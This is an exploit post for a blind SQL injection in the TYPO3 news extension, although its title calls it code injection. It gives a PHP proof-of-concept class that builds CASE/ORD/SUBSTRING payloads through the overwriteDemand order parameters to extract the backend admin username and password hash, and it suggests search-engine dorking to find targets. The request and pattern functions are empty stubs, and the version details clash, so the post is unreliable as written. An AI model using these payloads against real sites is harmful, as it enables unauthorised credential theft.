=============================================================================================================================================
| # Title     : TYPO 3.16.0 Code Injection Vulnerability                                                                                    |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits)                                                            |
| # Vendor    : https://typo3.org/                                                                                                          |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] a SQL Injection vulnerability In TYPO3 NewsController.php 
    in the news module 5.3.2 and earlier. 
    It allows an unauthenticated user to execute arbitrary SQL commands via vectors involving overwriteDemand and OrderByAllowed. 
	The SQL injection can be used to obtain password hashes for application user accounts. This module has been tested on TYPO3 3.16.0 running news extension 5.0.0.


[+] save code as poc.php .

[+] Line 9 : set your target.

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class Typo3NewsModuleSqli {
    private $targetUri;
    private $id;
    private $pattern1;
    private $pattern2;

    public function __construct($targetUri = '/', $id = '1', $pattern1 = 'Article #1', $pattern2 = 'Article #2') {
        $this->targetUri = $targetUri;
        $this->id = $id;
        $this->pattern1 = $pattern1;
        $this->pattern2 = $pattern2;
    }

    public function run() {
        list($pattern1, $pattern2) = $this->tryAutodetectPatterns();
        
        if (empty($pattern1) || empty($pattern2)) {
            echo "Unable to determine pattern, aborting...\n";
        } else {
            $this->dumpTheHash(['pattern1' => $pattern1, 'pattern2' => $pattern2]);
        }
    }

    private function dumpTheHash($patterns) {
        $username = $this->blind('username', 'be_users', 'uid=1', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789', $patterns);
        echo "Username: $username\n";
        $password = $this->blind('password', 'be_users', 'uid=1', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$./', '0123456789', $patterns);
        echo "Password Hash: $password\n";
    }

    private function blind($field, $table, $condition, $charset, $digitCharset, $patterns) {
        $offset = 9;
        $size = $this->blindSize("length($field)+$offset", $table, $condition, 2, $digitCharset, $patterns);
        $size = intval($size) - $offset;
        echo "Retrieving field '$field' string ($size bytes)...\n";
        return $this->blindSize($field, $table, $condition, $size, $charset, $patterns);
    }

    private function selectPosition($field, $table, $condition, $position, $char) {
        $payload1 = "SELECT $field FROM $table WHERE $condition";
        $payload2 = "ORD(SUBSTRING(($payload1) FROM $position FOR 1))";
        return "uid * (CASE WHEN ($payload2) = " . ord($char) . " THEN 1 ELSE -1 END)";
    }

    private function blindSize($field, $table, $condition, $size, $charset, $patterns) {
        $str = '';
        
        for ($position = 0; $position < $size; $position++) {
            foreach (str_split($charset) as $char) {
                $payload = $this->selectPosition($field, $table, $condition, $position + 1, $char);
                if ($this->test($payload, $patterns)) {
                    $str .= $char;
                    break;
                }
            }
        }
        
        return $str;
    }

    private function test($payload, $patterns) {
        $res = $this->sendRequest([
            'id' => $this->id,
            'tx_news_pi1[overwriteDemand][OrderByAllowed]' => $payload,
            'tx_news_pi1[overwriteDemand][order]' => $payload
        ]);

        if ($res && strpos($res, $patterns['pattern1']) !== false && strpos($res, $patterns['pattern2']) !== false) {
            return strpos($res, $patterns['pattern1']) < strpos($res, $patterns['pattern2']);
        }

        return false;
    }

    private function tryAutodetectPatterns() {
        echo "Trying to automatically determine Pattern1 and Pattern2...\n";
        
        $res = $this->sendRequest(['id' => $this->id]);
        
        $pattern1 = $this->extractPattern($res, 0);
        $pattern2 = $this->extractPattern($res, 1);

        if (empty($pattern1) || empty($pattern2)) {
            echo "Couldn't determine Pattern1 and Pattern2 automatically, switching to user specified values...\n";
            $pattern1 = $this->pattern1;
            $pattern2 = $this->pattern2;
        }

        echo "Pattern1: $pattern1, Pattern2: $pattern2\n";
        return [$pattern1, $pattern2];
    }

    private function extractPattern($res, $index) {
        // Dummy function for extracting pattern
        return ''; // Replace this with actual extraction logic.
    }

    private function sendRequest($params) {
        // Dummy function for sending HTTP requests. Replace with actual request logic.
        return '';
    }
}

// Example usage
$typo3Module = new Typo3NewsModuleSqli();
$typo3Module->run();

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================